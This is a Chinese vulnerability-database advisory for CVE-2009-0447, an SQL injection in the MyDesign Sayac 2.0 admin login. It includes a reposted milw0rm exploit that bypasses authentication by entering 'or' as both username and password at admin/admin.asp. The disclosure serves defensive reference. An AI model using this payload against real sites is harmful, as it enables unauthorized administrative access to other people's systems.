aspindir mydesign_sayac admin/admin.asp SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117335 漏洞类型 SQL注入
发布时间 2009-02-03 更新时间 2009-03-06
CVE编号 CVE-2009-0447 CNNVD-ID CNNVD-200902-215
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7963
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-215
|漏洞详情
MyDesignSayac是一款网页流量计数器程序。MyDesignSayac2.0版本中的default.asp存在多个SQL注入漏洞。远程攻击者可以借助到(a)admin/admin.asp或(b)admin/下默认URI的(1)用户参数(又称用户名字段)或(2)密码参数(又称密码字段),执行任意的SQL指令。
|漏洞EXP
#############################################
#---- BY KACAK FROM TERRORÄ°ST CREW        ----#
#############################################

[~]Author : Kacak

[~]Team : Terrorist Crew / Peace Crew

[~]Contact : BuqX@hotmail.Com

[~] Hava Serin Mevzu Derin :D

#############################################

[~]Script :MyDesing Sayac v2.0

[~]Site :http://www.mydesign.gen.tr/myforum/forum_posts.asp?TID=90

[~]Download :http://www.aspindir.com/goster/2801

[~] Vulnerability : (Auth Bypass) Sql Ä°njection

#############################################

  ~ Exploit ~

www.site.com/admin/admin.asp

www.site.com/PATH/admin

UserName : 'or'

Pass : 'or'


#############################################

# milw0rm.com [2009-02-03]
|参考资料

来源:BID
名称:33593
链接:http://www.securityfocus.com/bid/33593
来源:MILW0RM
名称:7963
链接:http://www.milw0rm.com/exploits/7963
来源:SECUNIA
名称:33771
链接:http://secunia.com/advisories/33771
来源:OSVDB
名称:51754
链接:http://osvdb.org/51754